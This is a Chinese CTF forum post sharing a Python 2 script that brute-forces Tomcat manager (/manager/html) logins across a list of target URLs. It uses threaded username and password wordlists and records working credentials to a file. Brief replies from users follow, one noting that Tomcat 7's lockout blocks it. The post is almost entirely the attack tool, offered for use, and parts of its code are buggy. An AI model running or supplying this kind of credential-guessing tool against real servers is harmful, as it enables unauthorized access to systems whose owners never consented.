CTF论坛 - CTF交流社区

[Linux环境] tomcat批量弱口令爆破工具(py版)

2017-7-31 17:32
29585

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x


[Python] 纯文本查看 复制代码
#!/usr/bin/env python 
 # -*- coding: utf-8 -*- 
 import sys 
 import requests 
 import threading 
 import Queue 
 import time 
 import base64 
 import os 
 #headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+[url]http://www.googlebot.com/bot.html[/url])'} 
 u=Queue.Queue() 
 p=Queue.Queue() 
 n=Queue.Queue() 
 #def urllist() 
 urls=open('url.txt','r') 
 def urllist(): 
     for url in urls: 
         url=url.rstrip() 
         u.put(url) 
 def namelist(): 
     names=open('name.txt','r') 
     for name in names: 
         name=name.rstrip() 
         n.put(name) 
 
 def passlist(): 
     passwds=open('pass.txt','r') 
     for passwd in passwds: 
         passwd=passwd.rstrip() 
         p.put(passwd) 
 
 def weakpass(url): 
     namelist() 
     while not n.empty(): 
         name =n.get() 
         #print name 
         passlist() 
         while not p.empty(): 
             good() 
             #name = n.get() 
             passwd = p.get() 
             #print passwd 
             headers = {'Authorization': 'Basic %s==' % (base64.b64encode(name+':'+passwd))} 
             try: 
                 r =requests.get(url,headers=headers,timeout=3) 
                 #print r.status_code 
                 if r.status_code==200: 
                     print '[turn] ' +url+' '+name+':'+passwd 
                     f = open('good.txt','a+') 
                     f.write(url+' '+name+':'+passwd+'\n') 
                     f.close() 
                 else: 
                     print '[false] ' + url+' '+name+':'+passwd 
             except: 
                 print '[false] '  + url+' '+name+':'+passwd 
 
 def list(): 
     while u.empty(): 
         url = u.get() 
         weakpass(name,url) 
 
 def thread(): 
     urllist() 
     tsk=[] 
     for i in open('url.txt').read().split('\n'): 
         i = i + '/manager/html'
         t = threading.Thread(target=weakpass,args=(i,)) 
         tsk.append(t) 
     for t in tsk: 
         t.start() 
         t.join(1) 
         #print "current has %d threads" % (threading.activeCount() - 1) 
 def good(): 
     good_ = 0
     for i in open('good.txt').read().split('\n'): 
         good_+=1
     os.system('title "weakpass------good:%s"' % (good_)) 
 
 if __name__=="__main__": 
    # alllist() 
     thread()

分享到 :
1 人收藏

5 个回复

倒序浏览
黑殇  初学乍练 | 2017-8-1 10:38:54
不错,很使用
Jesen 官方团队  管理员 | 2017-8-1 13:26:58
+1
whbill  初学乍练 | 2018-4-18 15:54:45
不错,试试
kombat  初窥堂奥 | 2018-10-1 23:14:56
不错 试试看
Free雅轩  初窥堂奥 | 6 天前
不能破tomcat7版本自带的锁定机制
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Anyone

初学乍练

积分: 5 帖子: 1 精华: 0

楼主热帖

Powered by Bugku! X3.2 © 2017 CTFbbs.

返回顶部